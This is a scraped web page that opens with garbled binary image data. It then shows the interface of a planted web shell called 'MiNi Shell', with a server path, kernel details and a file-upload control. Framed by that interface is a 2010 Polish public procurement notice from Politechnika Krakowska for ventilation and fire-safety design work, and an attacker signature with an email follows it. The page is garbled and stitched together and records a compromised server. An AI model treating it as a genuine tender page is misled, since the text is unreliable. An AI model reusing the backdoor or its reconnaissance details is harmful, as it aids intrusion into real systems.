JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100205/25595-N-2010.html

<p class="kh_header"><b>Kraków: Wykonanie wielobranżowej, projektowo-kosztorysowej dokumentacji budowy instalacji wentylacji mechanicznej wraz                z klimatyzacją oraz wygrodzeń pożarowych w budynku nr 10-35 Wydziału Inżynierii i Technologii Chemicznej Politechniki Krakowskiej przy ul. Warszawskiej 24 w Krakowie-w ramach zadania inwestycyjnego Termomodernizacja i wymiana instalacji wewnętrznych WIiTCH.</b><br>
<b>Numer ogłoszenia: 25595 - 2010; data zamieszczenia: 05.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Krakowska im. Tadeusza Kościuszki Dział Zamówień Publicznych , ul. Warszawska 24, 31-155 Kraków, woj. małopolskie, tel. 012 6282641, faks 012 6282072.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zampub@pk.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie wielobranżowej, projektowo-kosztorysowej dokumentacji budowy instalacji wentylacji mechanicznej wraz                z klimatyzacją oraz wygrodzeń pożarowych w budynku nr 10-35 Wydziału Inżynierii i Technologii Chemicznej Politechniki Krakowskiej przy ul. Warszawskiej 24 w Krakowie-w ramach zadania inwestycyjnego Termomodernizacja i wymiana instalacji wewnętrznych WIiTCH..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie dokumentacji projektowej w następującym zakresie:
1. Prace wstępne poprzedzające projektowanie 
2. Wielobranżowy projekt budowlany 
3. Wielobranżowy projekt wykonawczy
4.Sporządzenie specyfikacji technicznych wykonania i odbioru robót dla wszystkich branż
5.Sporządzenie przedmiarów i kosztorysów inwestorskich z uwzględnieniem etapowania prac dla wszystkich branż
6.Sporządzenie informacji dotyczącej planu BIOZ
Szczegółowy zakres robót
1.1. Prace wstępne poprzedzające projektowanie 
-	wykonanie inwentaryzacji do celów projektowych obejmującej istniejącą wentylację mechaniczną, urządzenia schładzające i instalację AKP pod kątem przydatności i wykorzystania dla projektowanej instalacji wentylacji mechanicznej
-	koncepcja projektowa instalacji wentylacji mechanicznej(bytowej, technologicznej oraz przeciwpożarowej) i klimatyzacji, 
-	konsultacje Wykonawcy z rzeczoznawcą d.s. ochrony ppoż. który jest autorem Oceny pożarowej  i koncepcji zabezpieczeń przeciwpożarowych dla całego budynku
-	konsultacje i udzielanie wytycznych przez Wykonawcę, projektantowi wielobranżowej dokumentacji technicznej budowy instalacji elektrycznych w budynku, pod kątem zharmonizowania obu projektów
1.2. Wielobranżowy projekt budowlany  obejmujący:
        Instalacje sanitarne w zakresie:
-	budowa instalacji wentylacji nawiewno - wywiewnej : socjalno-bytowej do wszystkich pomieszczeń i technologicznej dla dygestoriów 
-	budowa instalacji wentylacji ppoż. (poziomych i pionowych dróg ewakuacyjnych)
         Instalacje elektryczne w zakresie:
         -    budowa systemu zasilania central i urządzeń wentylacyjnych
   -    budowa systemu sygnalizacji pożaru i sterowanie wentylacją p.poż. i socjalno-  
              bytową  SAP.
   -    budowa systemu sterowania i automatyki 
   -    budowa Dźwiękowego Systemu Ostrzegawczego DSO
         Konstrukcję w zakresie:
         -    opinia konstrukcyjna o możliwości przebudowy : wentylacji i klimatyzacji oraz  
               wygrodzeń poziomych i pionowych z podziałem na strefy pożarowe
         Architekturę w zakresie:
          -   budowa wygrodzeń pożarowych i dróg ewakuacyjnych zgodnie z operatem   
               i koncepcją ochrony pożarowej budynku
          -   sufitów podwieszanych po montażu systemu wentylacji mechanicznej                             
               i klimatyzacji ,wykonanie obudowy kanałów i innych elementów wnętrz
          Charakterystykę energetyczną budynku (świadectwo energetyczne)
1.3. Wielobranżowy projekt wykonawczy
-	projekty wykonawcze mają uzupełniać i uszczegółowiać projekt budowlany w zakresie i stopniu dokładności niezbędnym do sporządzenia przedmiaru robót, kosztorysu inwestorskiego i realizacji robót budowlanych (etapowanie robót)
1.4. Pozostałe elementy dokumentacji
-	sporządzenie specyfikacji technicznych wykonania i odbioru robót dla wszystkich branż
-	sporządzenie przedmiarów i kosztorysów inwestorskich dla wszystkich branż oddzielnie
-	sporządzenie informacji dotyczącej planu BIOZ
-	uzyskanie uzgodnień z zakresu ochrony p.poż., wymagań sanitarno-higienicznych (SANEPID), bezpieczeństwa i higieny pracy oraz ergonomii(BHP), uzgodnienie projektu wymiennikowi z MPEC w zakresie wentylacji
-	dokonanie wszelkich uzgodnień branżowych koniecznych do wykonania przedmiotu zamówienia, uzyskanie wszelkich niezbędnych dokumentów do pozwolenia na budowę, opinii, ekspertyz oraz innych opracowań (ekspertyza konstrukcyjna itp.)
-	uzyskanie w razie takiej konieczności warunków technicznych do projektowania w zakresie instalacji wewnętrznych i przyłączy mediów
-	Wykonanie dokumentacji z uwzględnieniem konieczności etapowania co zostanie uzgodnione na etapie projektu  
-	Projekt wentylacji mech. i klimatyzacji ma być zaprojektowany dla całego budynku
1.5. Forma opracowania dokumentacji:
1.5.1. Forma opracowania inwentaryzacji
 Inwentaryzację do celów projektowych należy wykonać w 2 egzemplarzach w  
          wersji tradycyjnej w skali 1:100 oraz  w wersji elektronicznej - 2 egz. płytek  w   
          formacie oryginalnych plików oraz 2 egz. płytek w formacie *.pdf
1.5.2. Forma opracowania projektu budowlanego
           Projekt należy wykonać w 5 egzemplarzach w wersji tradycyjnej (wydruk wersji 
           


          elektronicznej), oraz w  wersji elektronicznej -  2 egz. płytek  w formacie                                                      
          oryginalnych plików oraz  2 egz. płytek w formacie *.pdf. 
1.5.3. Forma opracowania projektu wykonawczego
Projekt należy wykonać w 3 egzemplarzach w wersji tradycyjnej (wydruk wersji elektronicznej), oraz w  wersji elektronicznej -  2 egz. płytek  w formacie oryginalnych plików oraz  2 egz. płytek w formacie *.pdf.
1.5.4. Forma opracowania przedmiaru robót i kosztorysów inwestorskich zgodnie z 
zawartością projektu wykonawczego
Dokumentację przedmiarowo-kosztorysową należy wykonać w 3 egzemplarzach tradycyjnych z podziałem na przedmiary i kosztorysy w programie Rodos lub Zuzia lub w plikach możliwych do wczytania w przynajmniej z jednym z podanych programów (np. format xml) oraz przekazać Zamawiającemu wersję elektroniczną na dwóch płytkach CD  w formacie oryginalnych plików z podziałem na przedmiary i kosztorysy oraz  2x w formacie *.pdf z podziałem na przedmiary na dwóch osobnych płytkach
1.5.5. Forma opracowania Specyfikacji Technicznej Wykonania i Odbioru 
STWiOR należy wykonać w 3 egzemplarzach tradycyjnych oraz przekazać Zamawiającemu wersję elektroniczną  na 2 płytkach w formacie oryginalnym plików oraz na 2 -ch płytkach w formacie *.pdf
3. Podstawą do wykonania przedmiotowej dokumentacji jest:
-     Program funkcjonalno-użytkowy (współopracowany z kierownictwem instytutów i 
       zakładów)
- Wymagania Zamawiającego (podane na etapie projektowania)
- Ocena pożarowa i koncepcja zabezpieczeń ppoż. budynku
- Projekt budowlany (termomodernizacja i wymiana c.o.)
- Projekty archiwalne budynku - projekt przebudowy sal wykładowych
- Mapa syt-wys do celów projektowych 1:500
- Wykonawcę obowiązują  konsultacje w toku przygotowania projektu budowlanego i wykonawczego z Zamawiającym,  z rzeczoznawcą d.s. ppoż. wskazanym przez Zamawiającego oraz z projektantem instalacji elektrycznych dla budynku 10-35. 
- Koncepcja projektowa musi zostać zaakceptowana przez przedstawicieli Zamawiającego.

Wykonawca powinien założyć, że posiadane i/lub udostępniane przez Zamawiającego dokumenty wymagają aktualizacji ,staraniem i na koszt Wykonawcy, a informacje przekazywane przez Zamawiającego w formie ustnej i/lub pisemnej wymagają zweryfikowania przez Wykonawcę ze stanem faktycznym w toku oględzin i/lub ustaleń wspólnych Wykonawcy i Zamawiającego.
W przypadku nie posiadania lub nie udostępnienia przez Zamawiającego dokumentów niezbędnych  do wykonania  dokumentacji projektowej Wykonawca zobowiązany będzie uzyskać je własnym staraniem i na własny koszt, niezależnie od ich formy i źródła uzyskania i sporządzić wspólny z Użytkownikiem protokół z uzgodnieniami żądanych i możliwych do uzyskania parametrów technicznych w ramach aktualnej dokumentacji architektonicznej.
Dokumentacja projektowa powinna zawierać oświadczenie, że jest wykonana zgodnie z umową , a także obowiązującymi przepisami i normami, w stanie kompletnym z punktu widzenia celu, któremu ma służyć i  winna być zaopatrzona w wykaz opracowań. Przedmiotowa dokumentacja będzie służyć jako opis przedmiotu 
      zamówienia do przetargu na roboty budowlane w oparciu o Ustawę Prawo Zamówień Publicznych oraz na jej podstawie realizowany będzie pełny zakres robót budowlanych niezbędnych dla użytkowania obiektu zgodnie z przeznaczeniem.
Dokumentacja projektowa w swej treści powinna określać przedmiot zamówienia, w tym w szczególności technologię robót, materiały i urządzenia, a także parametry techniczne i funkcjonalne przyjętych rozwiązań materiałowych, wybranej technologii, urządzeń i wyposażenia w sposób nie utrudniający uczciwej konkurencji. Nie może opisywać przedmiotu zamówienia przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba, że jest to uzasadnione specyfiką przedmiotu zamówienia lub nie można tego opisać za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy /lub, równoważne/ lub inne równoznaczne wyrazy. O propozycji takiego opisu Wykonawca winien każdorazowo poinformować Zamawiającego.
Dokumentacja projektowa powinna opisywać przedmiot zamówienia za pomocą cech technicznych i jakościowych, przy przestrzeganiu Polskich Norm przenoszących europejskie normy zharmonizowane. Wszystkie niezbędne opinie, uzgodnienia i sprawdzenia rozwiązań projektowych w zakresie wynikającym z przepisów, oraz oświadczenie o wzajemnym skoordynowaniu technicznym opracowań projektowych powinny być wykonane przez osoby posiadające uprawnienia budowlane do projektowania w odpowiedniej specjalności, zapewniające uwzględnienie zawartych w przepisach zasad bezpieczeństwa i ochrony zdrowia w procesie budowy.
Przedmiar robót powinien zawierać opis robót budowlanych w kolejności technologicznej ich wykonania, z podaniem ilości jednostek przedmiarowych robót wynikających z dokumentacji projektowej i z STWiOR oraz podstawy do ustalenia cen jednostkowych robót lub nakładów rzeczowych 
Kosztorysy inwestorskie powinny być sporządzone w układzie branżowym jako oddzielne pracowania z uwzględnieniem etapowania prac
Wykonawca w trakcie opracowywania dokumentacji projektowej jest zobowiązany na bieżąco uzgadniać z Zamawiającym proponowane rozwiązania techniczne, technologiczne i materiałowe
Projektant będzie pełnił nadzory autorskie na podstawie odrębnej umowy ,
Płatne będą jedynie te nadzory autorskie, które nie będą wynikać z błędów dokumentacji projektowo -kosztorysowej

Wykonawca obowiązany jest wykonać przedmiot umowy zgodnie z wymaganiami zawartymi w SIWZ oraz  w programie funkcjonalno - użytkowym,  koncepcji ochrony pożarowej i umowie, które są załącznikami do SIWZ i stanowią jej integralną część..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.80.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 03.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości: 8 000.00 zł (słownie: osiem tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca biorący udział w postępowaniu winien wykazać, że :
d)	wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert,                 a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 projekt budowy lub przebudowy budynków użyteczności publicznej o powierzchni użytkowej min. 500 m2, w zakresie wentylacji/klimatyzacji i załączą dokument potwierdzający należyte wykonanie tej usługi (doświadczenie należy wykazać w załączniku nr 4 do SIWZ)
Przez budynek użyteczności publicznej należy rozumieć budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości kultury, kultu religijnego, oświaty , szkolnictwa wyższego, nauki, opieki zdrowotnej i socjalnej ,obsługi bankowej, handlu gastronomii, usług, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim, śródlądowym, świadczenia usług pocztowych lub telekomunikacyjnych oraz inny ogólnodostępny budynek przeznaczony do wykonywania podobnych funkcji w tym także budynek biurowy i socjalny
Ocena spełnienia warunku zostanie dokonana na zasadzie spełnia/nie spełnia na podstawie złożonego wykazu usług ( załącznik nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych  (Załącznik nr 2 do SIWZ),

Ocena spełnienia warunku zostanie dokonana na zasadzie spełnia/nie spełnia na podstawie złożonego oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca biorący udział w postępowaniu winien wykazać, że :
a) dysponuje osobami do wykonania i sprawdzenia dokumentacji projektowej posiadającymi uprawnienia bez ograniczeń w specjalnościach wymienionych  w załączniku nr 5 do SIWZ


b)	posiada projektanta wentylacji mechanicznej/klimatyzacji, który pełnił funkcję projektanta lub kierownika budowy lub inspektora nadzoru na min. 2 budowlach użyteczności publicznej o powierzchni użytkowej min. 500 m2,  w zakresie budowy lub przebudowy wentylacji/klimatyzacji ( doświadczenie należy wykazać w załączniku nr 5 do SIWZ)

c)	posiada projektanta systemu sterowania i automatyki, który pełnił funkcję projektanta lub kierownika budowy lub inspektora nadzoru na min. 2 budowlach użyteczności publicznej o powierzchni użytkowej min. 500 m2,  w zakresie budowy lub przebudowy wentylacji/klimatyzacji ( doświadczenie należy wykazać w załączniku nr 5 do SIWZ)

Ocena spełnienia warunku zostanie dokonana na zasadzie spełnia/nie spełnia na podstawie złożonego wykazu osób (załącznik nr 5 do SIWZ) zawierającego oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o spełnianiu warunków określonych w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych  (Załącznik nr 2 do SIWZ),

Ocena spełnienia warunku zostanie dokonana na zasadzie spełnia/nie spełnia na podstawie złożonego oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- formularz oferty    (Załącznik nr 1 do SIWZ)
- dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych
-pisemne zobowiązanie innych podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia        ( zgodnie z art. 26 ust. 2b) - jeżeli dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Cena za 1 nadzór autorski - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy w następującym zakresie:
1)	terminu realizacji przedmiotu zamówienia, gdy jest ona spowodowana:
a)	następstwem okoliczności leżących po stronie Zamawiającego ,takich jak: opóźnienia, utrudnienia lub przeszkodami dającymi się przypisać Zamawiającemu
b)	 koniecznością wykonania usług dodatkowych ,wpływających na termin wykonania robót objętych umową
                   Termin wykonania ulega przesunięciu o okres wynikający z przerw lub opóźnień.
2) osób przewidzianych do realizacji zamówienia przez Strony w przypadku nieprzewidzianych zdarzeń losowych min. takich jak: śmierć, choroba, ustanie stosunku pracy, pod warunkiem, że osoby zaproponowane będą posiadały takie same kwalifikacje jak osoby wskazane w umowie.
3) podwykonawcy, jeżeli podwykonawca nie został zaakceptowany przez Zamawiającego, nie wykonuje prac z należytą starannością, uległ likwidacji, doszło do rozwiązania umowy łączącej go z Wykonawcą 
4) wykazu podwykonawców, a w szczególności zakresu i wartości prac, pod warunkiem, że zapewni to prawidłową realizację umowy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pk.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba zamawiającego, budynek 10-24, pokój nr 110.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2010 godzina 11:30, miejsce: Siedziba zamawiającego, budynek 10-24, pokój nr 110.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Wykonawcy mogą dokonać wizji lokalnej na terenie obiektu ( budynek 10-35 WIiTCh, ul. Warszawska 24 w Krakowie) w dniu 10.02.2010 r. w godz. 10.00 - 12.00.  W tym celu należy skontaktować się z administratorem obiektu, p. Małgorzatą Stanek, tel. 12/628 26 30..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com